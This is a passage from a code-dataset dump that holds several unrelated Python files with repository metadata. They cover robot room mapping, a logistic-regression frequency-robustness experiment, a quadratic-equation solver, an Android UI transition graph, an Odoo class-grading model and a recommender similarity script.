serialHandler.getDistance(i)\n if(distance < 0):\n if(distance == -1):\n print(\"Error! Angle measurement invalid\")\n serialHandler.resetSensorMotor()\n i -= 10\n else:\n print(\"Error, no response from Arduino\")\n exit(1)\n i -= 10\n else:\n print(\"Response Distance: \" + str(distance))\n if(distance > 200):\n mapHandler.updateValue( i // 10, -1000)\n else:\n mapHandler.updateValue( i // 10, distance)\n print(\"------------------------------\")\n time.sleep(0.2)\n i += 10\n\n ## Movement command test\n #print(\"------------------------------\")\n #print(\"Sending Movement...\")\n #res = serialHandler.sendMovement(1.0)\n #if(res):\n # print(\"Success!\")\n #else:\n # print(\"Failed!\")\n #print(\"------------------------------\")\n #time.sleep(3)\n \n ## Rotation command test\n #print(\"------------------------------\")\n #print(\"Sending rotation...\")\n #res = serialHandler.sendRotation(3.0)\n #if(res):\n # print(\"Success!\")\n #else:\n # print(\"Failed!\")\n #print(\"------------------------------\")\n #time.sleep(3)\n # mapHandler.print()\n httpHandler.sendMap(mapHandler.getMap()) \n\n","repo_name":"rakane/RoomMapping","sub_path":"Beaglebone/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35497814007","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\n\nfrom src.utils_freq import batch_dct, dct, idct, getDCTmatrix\n\nfrom collections import defaultdict\nfrom tqdm import trange\nimport ipdb\n\nfrom torch.utils.data import DataLoader, TensorDataset\n\nimport matplotlib.pyplot as plt\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\n\ndef loader_LR(case, p, d, batchsize, mu, std, lambbda, iteration):\n \n total_size = batchsize*iteration\n \n x, y = data_init_LR(case, p, d, total_size, mu, std, lambbda)\n dataset = TensorDataset(x.t(), y.t())\n loader = DataLoader(dataset, batch_size = batchsize, pin_memory = True, shuffle=True)\n \n return loader\n\ndef data_init_LR(case = 1, p = 3, d = 10, total_size = 100000, mu = 1, std = 0.5, lambbda = 1):\n \n x_tilde = torch.zeros(d, total_size)\n y = torch.zeros(total_size)\n \n x_tilde[:p, :int(total_size/2)] = torch.normal(mean = mu, std = std, size = (p,int(total_size/2)))\n y[:int(total_size/2)] = 0\n \n x_tilde[:p, int(total_size/2):] = torch.normal(mean = -mu, std = std, size = (p,int(total_size/2)))\n y[int(total_size/2):] = 1\n\n if case ==1:\n x_tilde[p:,:] = 0\n elif case ==2:\n rand_sign = torch.rand_like(x_tilde[p:,:])-0.5\n rand_sign = (rand_sign/rand_sign.abs()).detach()\n x_tilde[p:,:] = torch.normal(mean = mu, std = std, size = (d-p,total_size)) * rand_sign\n elif case == 3:\n rand_sign = torch.rand_like(x_tilde[p:,:])-0.5\n rand_sign = (rand_sign/rand_sign.abs()).detach()\n x_tilde[p:,:] = torch.normal(mean = mu, std = std, size = (d-p,total_size)) * rand_sign\n decay = torch.exp(-lambbda*(torch.range(1, d-p))).view(d-p,1).repeat(1, total_size)\n x_tilde[p:,:] = x_tilde[p:,:] * decay\n\n x = idct(x_tilde)\n return x, y\n\ndef train_LR(args, model, opt, device):\n \n iteration = args[\"itr\"]\n _d = args[\"d\"]\n _p = args[\"p\"]\n _case = args[\"case\"]\n _batchsize = args[\"bsize\"]\n _mu = args[\"mu\"]\n _std = args[\"std\"]\n _lambbda = args[\"lambbda\"]\n _lr = args['lr']\n _method = args['method']\n \n log_dict = defaultdict(lambda: list())\n \n w_tilde = torch.zeros(_d, iteration, device = device)\n loss_logger = torch.zeros(1, iteration, device = device)\n acc_logger = torch.zeros(1, iteration, device = device)\n \n \n train_loader = loader_LR(_case, _p, _d, _batchsize, _mu, _std, _lambbda, iteration)\n \n dct_matrix = getDCTmatrix(_d)\n \n i = 0\n for x, y in train_loader:\n \n prev_w_tilde = dct(model.state_dict()['linear.weight'].view(_d,1)).squeeze().detach()\n\n x, y = x.t().to(device), y.t().to(device)\n \n if torch.isnan(x).sum().item() != 0:\n print(\"NaN detected in data: removed\", torch.isnan(x).sum().item(), \"datapoints\")\n nonNan_idx = torch.tensor(torch.isnan(x).sum(dim=0)==0, dtype = torch.bool)\n x = x[:,nonNan_idx]\n y = y[nonNan_idx]\n \n opt.zero_grad()\n\n z = model(x).view(y.shape)\n y_hat = torch.sigmoid(z)\n \n loss = torch.nn.BCEWithLogitsLoss()(z, y)\n \n batch_correct = ((z > 0) == (y==1)).sum().item()\n batch_acc = batch_correct /x.shape[1]*100\n\n loss_logger[:,i] = loss.item()\n acc_logger[:,i] = batch_acc\n\n if _method == 'weighted_l1f':\n factor = args['factor']\n# ipdb.set_trace()\n curr_w = model.linear.weight.t()\n curr_w_tilde = dct(curr_w)\n \n AVOID_ZERO_DIV = 1e-6\n mean_abs_x_tilde = batch_dct(x.t(), dct_matrix).abs().mean(dim=0)\n decay_factor = mean_abs_x_tilde/mean_abs_x_tilde[0]\n M = (1/(decay_factor+AVOID_ZERO_DIV)).view(1,_d)\n \n weighted_w_tilde = torch.mul(M, curr_w_tilde).squeeze()\n \n l1_reg = torch.norm(weighted_w_tilde,p=1)\n \n loss_reg = loss+factor*l1_reg \n loss_reg.backward()\n opt.step()\n elif _method == 'l1f':\n factor = args['factor']\n# ipdb.set_trace()\n curr_w = model.linear.weight.t()\n curr_w_tilde = dct(curr_w)\n \n AVOID_ZERO_DIV = 1e-6\n mean_abs_x_tilde = batch_dct(x.t(), dct_matrix).abs().mean(dim=0)\n decay_factor = mean_abs_x_tilde/mean_abs_x_tilde[0]\n M = (1/(decay_factor+AVOID_ZERO_DIV)).view(1,_d)\n M = torch.ones_like(M, device =device)\n \n weighted_w_tilde = torch.mul(M, curr_w_tilde).squeeze()\n \n l1_reg = torch.norm(weighted_w_tilde,p=1)\n \n loss_reg = loss+factor*l1_reg \n loss_reg.backward()\n opt.step()\n elif _method == 'l1s':\n factor = args['factor']\n curr_w = model.linear.weight.squeeze()\n l1_reg = torch.norm(curr_w,p=1)\n loss_reg = loss+factor*l1_reg \n loss_reg.backward()\n opt.step()\n else:\n loss.backward()\n curr_w = model.linear.weight.clone().detach()\n grad = model.linear.weight.grad.clone().detach()\n if _method == 'weighted_lr':\n dct_grad = dct(grad.t())\n AVOID_ZERO_DIV = 1e-6\n mean_abs_x_tilde = batch_dct(x.t(), dct_matrix).abs().mean(dim=0)\n decay_factor = mean_abs_x_tilde/mean_abs_x_tilde[0]\n M = (1/(decay_factor+AVOID_ZERO_DIV)).view(_d, 1)\n # M = M/M[0]\n # M = torch.ones_like(M, device = x.device) # for sanity check\n new_w = curr_w - idct(_lr * torch.mul(M,dct_grad)).t()\n else:\n new_w = curr_w - _lr * grad\n\n model.linear.weight = torch.nn.parameter.Parameter(new_w)\n \n curr_w_tilde = dct(model.state_dict()['linear.weight'].view(_d,1)).squeeze().detach()\n\n w_tilde[:,i] = curr_w_tilde\n \n i += 1\n \n log_dict[\"w_tilde\"] = w_tilde\n log_dict[\"loss\"] = loss_logger\n log_dict[\"acc\"] = acc_logger\n \n return log_dict\n\n# def loss_under_attack(args, model, device):\n \n# loss_adv = torch.zeros(3, device = device) # 3 types of attacks\n# _d = args[\"d\"]\n# _case = args[\"case\"]\n# _batchsize = args[\"bsize\"]\n# _mu = args[\"mu\"]\n# _std = args[\"std\"]\n# _lambbda = args[\"lambbda\"]\n# _lr = args[\"lr\"]\n# _eps = args[\"eps\"]\n \n# x, y = data_init_LR(_case, _d, _batchsize, _mu, _std, _lambbda) \n# x, y = x.to(device), y.to(device)\n \n \n# y_hat = model(x)\n# r = (y_hat.t() - y)\n \n# w = model.state_dict()['linear.weight'].squeeze().detach()\n# w_tilde = dct(w.view(_d,1)).detach()\n \n\n# # #attack 1: all k's\n# # delta_x_1_tilde = _eps * torch.sign(r) * w_tilde / torch.norm(w_tilde).detach()\n# # delta_x_1 = idct(delta_x_1_tilde)\n# # y_adv_1 = model(x+delta_x_1)\n# # loss_1 = ((1/2) * (y_adv_1.t() - y) ** 2).mean().item()\n \n# # #attack 2: highest k\n# # attack_k = torch.ones(_d, device = device)\n# # attack_k[0:-1] = 0\n# # V = torch.diag(attack_k)\n# # V_w_tilde = torch.mm(V, w_tilde)\n# # delta_x_2_tilde = _eps * torch.sign(r) * V_w_tilde / torch.norm(V_w_tilde).detach()\n# # delta_x_2 = idct(delta_x_2_tilde)\n# # y_adv_2 = model(x+delta_x_2)\n# # loss_2 = ((1/2) * (y_adv_2.t() - y) ** 2).mean().item()\n \n# #attack 3: k != 0\n# attack_k = torch.ones(_d, device = device)\n# attack_k[0] = 0\n# V = torch.diag(attack_k)\n# V_w_tilde = torch.mm(V, w_tilde)\n# # ipdb.set_trace()\n# # if _case == 1:\n# # print(w_tilde)\n# delta_x_3_tilde = _eps * torch.sign(r) * V_w_tilde / torch.norm(V_w_tilde).detach()\n# delta_x_3 = idct(delta_x_3_tilde)\n# y_adv_3 = model(x+delta_x_3)\n# loss_3 = ((1/2) * (y_adv_3.t() - y) ** 2).mean().item()\n \n \n# loss_adv[0], loss_adv[1], loss_adv[2] = 0, 0, loss_3\n \n# return loss_adv\n \n# def plot_loss_LR(log, threshold = 1e-3, plot_itr = 1000):\n \n# THRESHOLD = threshold\n \n# fig = plt.figure(figsize = [15,7])\n# fig.patch.set_facecolor('white')\n# gs = fig.add_gridspec(1,1)\n \n# loss_var, loss_mean = torch.var_mean(log, dim = 1) \n# fill_up = loss_mean + loss_var\n# fill_low = loss_mean - loss_var\n\n# xrange = np.arange(log.shape[0]) \n \n# loss_below_threshold = loss_mean < THRESHOLD\n \n \n# for i in range(log.shape[2]):\n# fig.add_subplot(gs[0,0]).plot(loss_mean[:, i], color = \"C\"+str(i), label = \"case \"+str(i+1), linewidth=3.0, marker = \"\")\n# fig.add_subplot(gs[0,0]).fill_between(xrange, fill_up[:, i], fill_low[:, i], color = \"C\"+str(i), alpha=0.3)\n \n# try:\n# fig.add_subplot(gs[0,0]).axvline(x=loss_below_threshold[:,i].tolist().index(1), color = \"C\"+str(i), linestyle = '--')\n# except ValueError as e:\n# print(\"Above loss threshold! (loss plot)\")\n \n# fig.add_subplot(gs[0,0]).set_xlim([0, plot_itr])\n \n \n# fig.add_subplot(gs[0,0]).legend(prop={\"size\": 10})\n# fig.add_subplot(gs[0,0]).set_ylabel(\"loss\")\n# fig.add_subplot(gs[0,0]).set_xlabel(\"Training iteration\")\n# fig.add_subplot(gs[0,0]).set_title(\"loss\",fontsize = 20)\n# fig.add_subplot(gs[0,0]).legend(prop={\"size\": 10})\n# fig.tight_layout()\n# plt.gca().spines['top'].set_visible(False)\n# plt.gca().spines['right'].set_visible(False)\n \n# def plot_risk_LR(args, w_tilde_log, loss_log, threshold = 1e-3, plot_itr = 1000):\n \n# THRESHOLD = threshold\n \n# _std = args[\"std\"]\n# _lr = args[\"lr\"]\n# _d = args[\"d\"]\n# _lambbda = args[\"lambbda\"]\n \n# w_tilde_log_copy = w_tilde_log.clone().detach()\n \n# fig = plt.figure(figsize = [15,7])\n# fig.patch.set_facecolor('white')\n# gs = fig.add_gridspec(1,1)\n \n# loss_var, loss_mean = torch.var_mean(loss_log, dim = 1) \n# fill_up = loss_mean + loss_var\n# fill_low = loss_mean - loss_var\n\n# xrange = np.arange(loss_log.shape[0]) \n \n# loss_below_threshold = loss_mean < THRESHOLD\n \n \n# for i in range(loss_log.shape[2]):\n# # for i in [2]:\n# fig.add_subplot(gs[0,0]).plot(loss_mean[:, i], color = \"C\"+str(i), label = \"case \"+str(i+1), linewidth=3.0, marker = \"\")\n# fig.add_subplot(gs[0,0]).fill_between(xrange, fill_up[:, i], fill_low[:, i], color = \"C\"+str(i), alpha=0.3)\n \n# if i == 0: # case 1\n# e_0 = w_tilde_log_copy[0,0,:,0] - 1 # only supports numb_runs = 1, so error will occur if we do average over multiple runs\n# risk = 0.5 * e_0**2 * _std**2 * torch.tensor(1 - 2*_lr*_std**2 + 3*_lr**2*_std**4)**torch.tensor(xrange)\n# fig.add_subplot(gs[0,0]).plot(risk, color = \"C\"+str(i+3), label = \"case \"+str(i+1)+\" risk\", linewidth=3.0, marker = \"\")\n# elif i == 1: # case 2\n# e_0 = w_tilde_log_copy[:,0,:,1] # only supports numb_runs = 1, so error will occur if we do average over multiple runs\n# e_0[0] = e_0[0] - 1\n# risk = 0.5 * torch.norm(e_0, p =2)**2 * _std**2 * torch.tensor(1 - 2*_lr*_std**2 + 3*_lr**2*_std**4)**torch.tensor(xrange)\n# fig.add_subplot(gs[0,0]).plot(risk, color = \"C\"+str(i+3), label = \"case \"+str(i+1)+\" risk\", linewidth=3.0, marker = \"\")\n# elif i ==2: # case 3\n# e_i = w_tilde_log_copy[:,0,:,2]\n# e_i[0] -= 1\n# # ipdb.set_trace()\n# bracket_term = [np.exp(-2*d*_lambbda)*torch.tensor(1 - 2 * _lr * _std**2 * np.exp(-2*d*_lambbda) + 3 * _lr**2 * _std**4 * np.exp(-4*d*_lambbda))**torch.tensor(xrange) for d in range(_d)]\n# sum_term = torch.stack(bracket_term).T @ (torch.tensor(e_i)**2)\n# risk = 0.5 * _std**2 * sum_term\n# fig.add_subplot(gs[0,0]).plot(risk, color = \"C\"+str(i+3), label = \"case \"+str(i+1)+\" risk\", linewidth=3.0, marker = \"\")\n\n# try:\n# fig.add_subplot(gs[0,0]).axvline(x=loss_below_threshold[:,i].tolist().index(1), color = \"C\"+str(i), linestyle = '--')\n# except ValueError as e:\n# print(\"Above loss threshold! (loss plot)\")\n \n# fig.add_subplot(gs[0,0]).set_xlim([0, plot_itr])\n \n \n# fig.add_subplot(gs[0,0]).legend(prop={\"size\": 10})\n# fig.add_subplot(gs[0,0]).set_ylabel(\"loss\")\n# fig.add_subplot(gs[0,0]).set_xlabel(\"Training iteration\")\n# fig.add_subplot(gs[0,0]).set_title(\"loss\",fontsize = 20)\n# fig.add_subplot(gs[0,0]).legend(prop={\"size\": 10})\n# fig.tight_layout()\n# plt.gca().spines['top'].set_visible(False)\n# plt.gca().spines['right'].set_visible(False)\n\n \n# def plot_w_tilde_LR(log, threshold = 1e-3):\n \n# THRESHOLD = threshold\n \n# fig = plt.figure(figsize = [15,15])\n# fig.patch.set_facecolor('white')\n# gs = fig.add_gridspec(10,1)\n \n# w_tilde_log = log.clone().detach()\n# w_tilde_log[0,:,:,:] = w_tilde_log[0,:,:,:]-1\n \n# w_tilde_diff_var, w_tilde_diff_mean = torch.var_mean(w_tilde_log, dim = 2, unbiased = True)\n\n# xrange = np.arange(log.shape[1])\n \n# w_tilde_diff_below_threshold = w_tilde_diff_mean.abs() < THRESHOLD\n \n# for i in range(log.shape[3]):\n# for j in range(10):\n# fig.add_subplot(gs[j,0]).plot(w_tilde_diff_mean[j,:,i], color = \"C\"+str(i), label = \"case \" + str(i+1), linewidth=3.0, marker = \"\")\n# # fig.add_subplot(gs[j,0]).fill_between(xrange, fill_up[j,:,i-1], fill_low[j,:,i-1], color = \"C\"+str(i), alpha=0.3)\n# try:\n# fig.add_subplot(gs[j,0]).axvline(x=w_tilde_diff_below_threshold[j,:,i].tolist().index(1), color = \"C\"+str(i), linestyle = '--')\n# except ValueError as e:\n# print(\"Above loss threshold! (w_tilde plot) \", i, j)\n \n# fig.add_subplot(gs[0,0]).legend(prop={\"size\": 10}) \n# fig.add_subplot(gs[0,0]).set_title(\"$\\~e(k)$\",fontsize = 20)\n# fig.add_subplot(gs[0,0]).legend(prop={\"size\": 10})\n# fig.add_subplot(gs[5,0]).set_ylabel(\"Frequency\")\n# fig.add_subplot(gs[9,0]).set_xlabel(\"Training iteration\")\n \n# fig.tight_layout()\n\n\n# def plot_dw_tilde_LR(log):\n \n# fig = plt.figure(figsize = [15,7])\n# fig.patch.set_facecolor('white')\n# # gs = fig.add_gridspec(10,1)\n \n# # dw_tilde_log = log.clone().detach()\n \n# # for j in range(10):\n# # fig.add_subplot(gs[j,0]).plot(dw_tilde_log[0,j,:].cpu().numpy(), color = \"C1\", label = \"actual\", linewidth=3.0, marker = \"\")\n# # fig.add_subplot(gs[j,0]).plot(dw_tilde_log[1,j,:].cpu().numpy(), color = \"C2\", label = \"estimated\", linewidth=3.0, marker = \"\")\n \n# gs = fig.add_gridspec(1,1)\n \n# dw_tilde_log = log.clone().detach()\n \n# for j in range(10):\n# fig.add_subplot(gs[0,0]).plot(dw_tilde_log[0,j,:].cpu().numpy(), color = \"C\"+str(j), label = \"actual\"+str(j), linewidth=3.0, marker = \"\",alpha=0.2)\n# fig.add_subplot(gs[0,0]).plot(dw_tilde_log[1,j,:].cpu().numpy(), color = \"C\"+str(j), label = \"estimated\"+str(j), linewidth=2.0, marker = \"\")\n \n# fig.add_subplot(gs[0,0]).legend(prop={\"size\": 10}) \n# # fig.add_subplot(gs[0,0]).set_xlabel(\"Training iteration\")\n# fig.tight_layout()\n# plt.gca().spines['top'].set_visible(False)\n# plt.gca().spines['right'].set_visible(False)\n \n \n# def plot_risk_adv_LR(log, threshold = 1e-3, plot_itr = 1000):\n# #simona\n# return 0\n \n# def plot_loss_adv_LR(log, threshold = 1e-3, plot_itr = 1000):\n \n# THRESHOLD = threshold\n \n \n# fig = plt.figure(figsize = [15,7])\n# fig.patch.set_facecolor('white')\n# gs = fig.add_gridspec(1,1)\n \n \n \n# loss_var, loss_mean = torch.var_mean(log, dim = 2)\n# # print(loss_mean.shape)\n# fill_up = loss_mean + loss_var\n# fill_low = loss_mean - loss_var\n\n# xrange = np.arange(log.shape[0])\n \n\n \n# loss_below_threshold = loss_mean < THRESHOLD\n \n# # print(loss_below_threshold.shape)\n \n# #loss_mean: [iteration, attacks, case]\n# # for _case in range(loss_mean.shape[2]):\n# # for _attack in range(loss_mean.shape[1]):\n# # fig_label = \" attack \"+str(_attack+1)\n# # fig.add_subplot(gs[_case,0]).plot(loss_mean[:, _attack, _case], color = \"C\"+str(_attack), label = fig_label, linewidth=3.0, marker = \"\")\n \n# # fig.add_subplot(gs[_case,0]).set_title(\"case \"+str(_case+1))\n# # fig.add_subplot(gs[_case,0]).legend(prop={\"size\": 10})\n \n \n# # for _attack in range(loss_mean.shape[1]):\n# # for _case in range(loss_mean.shape[2]):\n# # fig_label = \" case \"+str(_case+1)\n# # fig.add_subplot(gs[_attack+3,0]).plot(loss_mean[:, _attack, _case], color = \"C\"+str(_case), label = fig_label, linewidth=3.0, marker = \"\")\n \n# # fig.add_subplot(gs[_attack+3,0]).set_title(\"attack \"+str(_attack+1))\n# # fig.add_subplot(gs[_attack+3,0]).legend(prop={\"size\": 10})\n \n# for _case in range(loss_mean.shape[2]):\n# fig_label = \" case \"+str(_case+1)\n# fig.add_subplot(gs[0,0]).plot(loss_mean[:, 2, _case], color = \"C\"+str(_case), label = fig_label, linewidth=3.0, marker = \"\")\n# try:\n# fig.add_subplot(gs[0,0]).axvline(x=loss_below_threshold[:,2,_case].tolist().index(1), color = \"C\"+str(_case), linestyle = '--')\n# except ValueError as e:\n# print(\"Above loss threshold\")\n \n# fig.add_subplot(gs[0,0]).set_xlim([0, plot_itr])\n\n# # fig.add_subplot(gs[0,0]).set_title(\"attack \"+str(_case+1))\n# title_text = \"loss under attack with \"+ r\"$ \\Delta x = iDCT\\{ \\epsilon sign(r) \\frac{V\\~w}{||V\\~w||}\\}$ where $V =diag\\{0,1,...,1\\}$\"\n# fig.add_subplot(gs[0,0]).set_title(title_text,fontsize = 20)\n# fig.add_subplot(gs[0,0]).legend(prop={\"size\": 10})\n \n \n \n# # fig.add_subplot(gs[0,0]).fill_between(xrange, fill_up[:, i], fill_low[:, i], color = \"C\"+str(i), alpha=0.3)\n# # try:\n# # fig.add_subplot(gs[0,0]).axvline(x=loss_below_threshold[:,i].tolist().index(1), color = \"C\"+str(i), linestyle = '--')\n# # except ValueError as e:\n# # print(\"Above loss threshold\")\n \n \n# # fig.add_subplot(gs[0,0]).legend(prop={\"size\": 10})\n# fig.add_subplot(gs[0,0]).set_ylabel(\"loss\")\n# fig.add_subplot(gs[0,0]).set_xlabel(\"Training iteration\")\n# fig.tight_layout()\n# plt.gca().spines['top'].set_visible(False)\n# plt.gca().spines['right'].set_visible(False)\n \n \n \n \n \n \n \n### OBSOLETE ### \n# def train_LR_optim_lr(args, model, device):\n \n# iteration = args[\"itr\"]\n# _d = args[\"d\"]\n# _case = args[\"case\"]\n# _batchsize = args[\"bsize\"]\n# _mu = args[\"mu\"]\n# _std = args[\"std\"]\n# _lambbda = args[\"lambbda\"]\n# _lr = args[\"lr\"]\n \n# log_dict = defaultdict(lambda: list())\n \n# w = torch.zeros(_d, iteration, device = device)\n# w_tilde = torch.zeros(_d, iteration, device = device)\n# dw_tilde = torch.zeros(2, _d, iteration, device = device)\n# loss_log = torch.zeros(1, iteration, device = device)\n \n# optim_init = False\n# # opt = optim.SGD(model.parameters(), lr = 1e-2)\n \n# with trange(iteration) as t:\n# for i in range(iteration):\n\n# x, y = data_init_LR( case = _case, \n# d = _d, \n# batchsize = _batchsize, \n# mu = _mu, \n# std = _std, \n# lambbda = _lambbda)\n\n# x, y = x.to(device), y.to(device)\n\n# w_tilde_prev = dct(list(model.parameters())[0][0].view(_d,1)).squeeze().detach()\n \n \n# #### compute optimum learning rate:\n# # if _case == 1 and not optim_init:\n# # x_tilde = dct(x).squeeze()\n# # eta = 1/y.item()**2\n# # opt = optim.SGD(model.parameters(), lr = eta)\n# # optim_init = True\n# # print(\"init\")\n# # elif _case == 2 and not optim_init:\n# # x_tilde = dct(x).squeeze()\n# # eta = ((w_tilde_prev[0]-1)/(x_tilde[0]*(x_tilde*w_tilde_prev)[1:].sum() + x_tilde[0]**2 * (w_tilde_prev[0]-1) )).item()\n# # opt = optim.SGD(model.parameters(), lr = eta)\n# # optim_init = True\n# # print(\"init\")\n# # elif _case == 3 and not optim_init:\n \n# if not optim_init:\n# x_tilde = dct(x).squeeze()\n# eta = ((w_tilde_prev[0]-1)/(x_tilde[0]*(x_tilde*w_tilde_prev)[1:].sum() + x_tilde[0]**2 * (w_tilde_prev[0]-1) )).item()\n# opt = optim.SGD(model.parameters(), lr = eta)\n# optim_init = True\n# print(\"init\")\n \n\n# opt.zero_grad()\n\n# y_hat = model(x)\n# ipdb.set_trace()\n# # print(y_hat)\n\n# loss = ((1/2) * (y_hat.t() - y) ** 2).mean()\n# print(\"loss:\", loss.item())\n \n \n# # print(w_tilde_prev - eta*(y_hat-y).item()*x_tilde)\n# loss_log[:,i] = loss.item()\n\n\n# loss.backward()\n# opt.step()\n\n# w[:,i] = list(model.parameters())[0][0].detach()\n \n# w_tilde[:,i] = dct(w[:,i].view(_d,1)).squeeze().detach()\n# # print(-eta*(x_tilde[0]*(x_tilde*w_tilde_prev)[1:].sum() + y.item()**2*(w_tilde_prev[0]-1)).item())\n# # ipdb.set_trace()\n# # print(-eta*(((x_tilde*w_tilde_prev).sum() - y.item())*x_tilde)[0].item())\n# print(\"gradient update at dim 0 : \", w_tilde[0,i] - w_tilde_prev[0])\n# print(w_tilde[0,i])\n# dw_tilde[0,:,i] = -(w_tilde[:,i] - w_tilde_prev).detach()\n# dw_tilde[1,:,i] = grad_estimation(w_tilde_prev, \n# _lr, \n# _case, \n# _d, \n# _mu, \n# _std, \n# _lambbda).squeeze().detach()\n\n# t.set_postfix(loss = loss.item())\n# t.update()\n \n# log_dict[\"w\"] = w\n# log_dict[\"w_tilde\"] = w_tilde\n# log_dict[\"dw_tilde\"] = dw_tilde\n# log_dict[\"loss\"] = loss_log\n\n# return log_dict\n\n# def plot_first_dim_comparison_LR():\n# fig_test = plt.figure(figsize = [15,5])\n# gs = fig_test.add_gridspec(1,1)\n# p1 = fig_test.add_subplot(gs[0,0]).imshow(diff_map.cpu().detach().numpy(), cmap = 'Reds', aspect = 40.0, vmax = diff_map.max(), vmin = 0)\n# fig_test.colorbar(p1)\n# fig_test.add_subplot(gs[0,0]).set_ylabel(\"Frequency\")\n# fig_test.add_subplot(gs[0,0]).set_xlabel(\"Training iteration\")\n# plt.gca().spines['top'].set_visible(False)\n# plt.gca().spines['right'].set_visible(False)","repo_name":"averyma/freq-robust-obsolete","sub_path":"src/logistic_analysis.py","file_name":"logistic_analysis.py","file_ext":"py","file_size_in_byte":23221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"10089020799","text":"print('MENCARI AKAR AKAR PERSAMAAN KUADRAT')\nimport time\nprint('please wait...')\ntime.sleep(2)\nprint('\\x1bc')\nimport math\ncount=1\nwhile count >0 :\n\tprint('\\x1bc')\n\tprint('Masukkan angka')\n\ta=float(input('a = '))\n\tb=float(input('b = '))\n\tc=float(input('c = '))\n\tD=a*c*4\n\tplusmin= math.sqrt ( b**2 - D)\n\txsatu=(-b+plusmin)/(2*a)\n\txdua=(-b-plusmin)/(2*a)\n\tprint('maka,') ; print ('diskriminan = ', D)\n\tprint('akar akar persamaan = ', xsatu , ' atau ' , xdua)\n\tpenentu=input('Lagi? Y/N? ')\n\tif penentu=='N':\n\t\tbreak\n\telif penentu=='Y':\n\t\tcount=count+1\n\telse :\n\t\tprint('\\x1bc')\n\t\tprint('JAWAB YANG BENER WOI')\n\t\ttime.sleep (2)\n\t\tprint('Dahlah, males...., ngodingnya lama')\n\t\ttime.sleep(1)\n\t\tbreak\n","repo_name":"Hamdan26/persamaankuadratcobacoba","sub_path":"perskuad.py","file_name":"perskuad.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29733727736","text":"class UTG(object):\n \"\"\"\n UI transition graph\n \"\"\"\n\n def __init__(self, device, app):\n self.device = device\n self.app = app\n\n self.node2states = {}\n self.edge2events = {}\n\n def add_transition(self, event_str, old_state, new_state):\n old_node = self.state_to_node(old_state)\n new_node = self.state_to_node(new_state)\n self.add_edge(event_str, old_node, new_node)\n\n def state_to_node(self, state):\n if state is None:\n state_str = \"none\"\n state_tag = \"none\"\n else:\n state_str = state.get_state_str()\n state_tag = state.tag\n if state_str not in self.node2states:\n self.node2states[state_str] = []\n self.node2states[state_str].append(state_tag)\n return state_str\n\n def add_edge(self, event_str, old_node, new_node):\n if old_node == new_node:\n return\n edge_str = \"<%s> --> <%s>\" % (old_node, new_node)\n if edge_str not in self.edge2events:\n self.edge2events[edge_str] = []\n self.edge2events[edge_str].append(event_str)\n","repo_name":"MiniMinyi/app_traffic_collector","sub_path":"droidbot/droidbot/utg.py","file_name":"utg.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40577333022","text":"from odoo import fields,api,models\nfrom odoo.exceptions import ValidationError\n\nclass ClassManage(models.Model):\n _name = \"class.manage\"\n _description = \"Quản lý lớp học\"\n\n classname = fields.Char(string='Lớp')\n number = fields.Integer(string='Sĩ số',readonly=True)\n number1 = fields.Integer(string='Số HS TB',readonly=True,compute='_hs') \n number2 = fields.Integer(string='Số HS Khá',readonly=True,compute='_hs')\n number3 = fields.Integer(string='Số HS Giỏi',readonly=True,compute='_hs')\n classman_id = fields.One2many('class.student','classstu_id',string='Lớp học')\n\n\n @api.depends('classman_id')\n def _hs(self):\n for diem in self:\n diem.number = len(diem.classman_id)\n diem.number1 = len(diem.classman_id.filtered(lambda r: r.value == 'TB'))\n diem.number2 = len(diem.classman_id.filtered(lambda r: r.value == 'K'))\n diem.number3 = len(diem.classman_id.filtered(lambda r: r.value == 'G'))\n\nclass ClassStudent(models.Model):\n _name = \"class.student\"\n _description = \"Quản lý học sinh\"\n\n classstu_id = fields.Many2one('class.manage',string='Lớp',required=True,ondelete='cascade')\n name = fields.Char(string='Họ tên')\n point = fields.Integer(string='Điểm')\n value = fields.Selection([('TB','Trung bình'),\n ('K','Khá'),\n ('G','Giỏi')],\n string='Đánh giá',compute='_danh_gia')\n \n @api.constrains('point')\n def _check_point(self):\n for diem in self:\n if diem.point < 0 or diem.point > 10:\n raise ValidationError('Điểm số phải nằm trong khoảng từ 0 đến 10')\n \n @api.depends('point')\n def _danh_gia(self):\n for diem in self:\n if diem.point <= 6:\n diem.value = 'TB'\n elif diem.point <= 8:\n diem.value = 'K'\n else:\n diem.value = 'G'\n","repo_name":"mrsunday2705/khung","sub_path":"models/classman.py","file_name":"classman.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72424017414","text":"# matrix of users_item\n# divide dataset\n# normalizer dataset for only 0 or 1\n# calculate similarities between users of trainning set\n# save similarities\n\nimport pandas as pd\nimport numpy as np\nimport sys\nfrom calculateSimilarity import *\n\ndef getUserClustersMatrixFromCSV(csvPath):\n matrix = pd.read_csv(csvPath)\n\n return pd.DataFrame(matrix)\n\n\ndef reduceDataFrame(df, toReduce):\n '''\n reduce data for the desired columns, to calculate similarity\n :param df: pandas df\n :return: pandas df reduced\n '''\n\n df = df.drop(df.columns[toReduce], axis=1)\n\n return df\n\n\ndef divideDataSetCrossValidation(df, limitMin, limitMax):\n '''\n\n :param df:\n :param limitMin:\n :param limitMax:\n :return:\n '''\n\n training = df.drop(df.columns[[np.arange(limitMin, limitMax)]], axis=1)\n\n test = df[df.columns[limitMin:limitMax]]\n #test = df.drop(df.columns[[np.arange(0, limit1)]], axis=1)\n\n return training, test\n\n\ndef divideDataSet(df, percentage):\n\n '''\n\n :param df:\n :param percentage:\n :return: pandas arrays\n '''\n sSize, ySize = df.shape\n\n limit1 = int(ySize * percentage)\n\n training = df.drop(df.columns[[np.arange(limit1, ySize)]], axis=1)\n\n test = df.drop(df.columns[[np.arange(0, limit1)]], axis=1)\n\n return training, test\n\n\ndef getItemItemSimilarity(item, 